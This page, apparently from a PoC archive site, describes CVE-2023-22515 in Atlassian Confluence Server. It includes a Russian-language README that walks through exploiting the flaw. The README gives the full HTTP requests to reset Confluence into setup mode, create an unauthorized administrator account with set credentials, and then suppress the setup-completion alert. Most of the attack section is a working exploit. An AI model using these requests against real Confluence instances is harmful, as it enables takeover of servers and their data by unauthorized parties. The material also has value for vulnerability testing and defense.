Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-22515 PoC — Atlassian Confluence Server 安全漏洞

Source
https://github.com/xorbbo/cve-2023-22515
Associated Vulnerability
Title:Atlassian Confluence Server 安全漏洞 (CVE-2023-22515)
Description:Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
Description
NSE script to check if app is vulnerable to cve-2023-22515
Readme
# CVE-2023-22515

Тут описана логика эксплуатации уязвимости, через Burp Suite.

Для эксплуатации необходимо изменить значение атрибута `bootstrapStatusProvider.applicationConfig.setupComplete` на  `false`, то есть выполнить запрос:

### Ручка перевода Confluence в режим настройки:
```burp
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: 192.168.1.37:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=77149CD086735B59F8F7FBE253D563AC
Upgrade-Insecure-Requests: 1
Priority: u=1
```

Это позволяет нам инициировать начальную настройку сервера, что в свою очередь даёт нам возможность создавать учётные записи с правами администратора.


### Пэйлоад на создание учётной записи с правами администратора:
```burp
POST /setup/setupadministrator.action HTTP/1.1
Host: 192.168.1.37:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1
X-Atlassian-Token: no-check
Content-Length: 137
Content-Type: application/x-www-form-urlencoded

username=not_xorbbo&fullName=NotXorbbo&email=not.xorbbo%40localhost&password=PasswordAnim3&confirm=PasswordAnim3&setup-next-button=Next
```


После эксплуатации уязвимости рекомендуется сделать POST-запрос для отключения алерта о завершении конфигурации Confluence'а:
### Отключение алерта:
```
POST /setup/finishsetup.action HTTP/1.1
Host: 192.168.1.37:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1
X-Atlassian-Token: no-check
Referer: http://192.168.1.37:8090/setup/setupadministrator.action
```
File Snapshot

 [4.0K]  /data/pocs/ba4b7673fa02f54620b7877f6b39ee02870b29b8
├── [1.2K]  cve-2023-22515.nse
└── [2.6K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →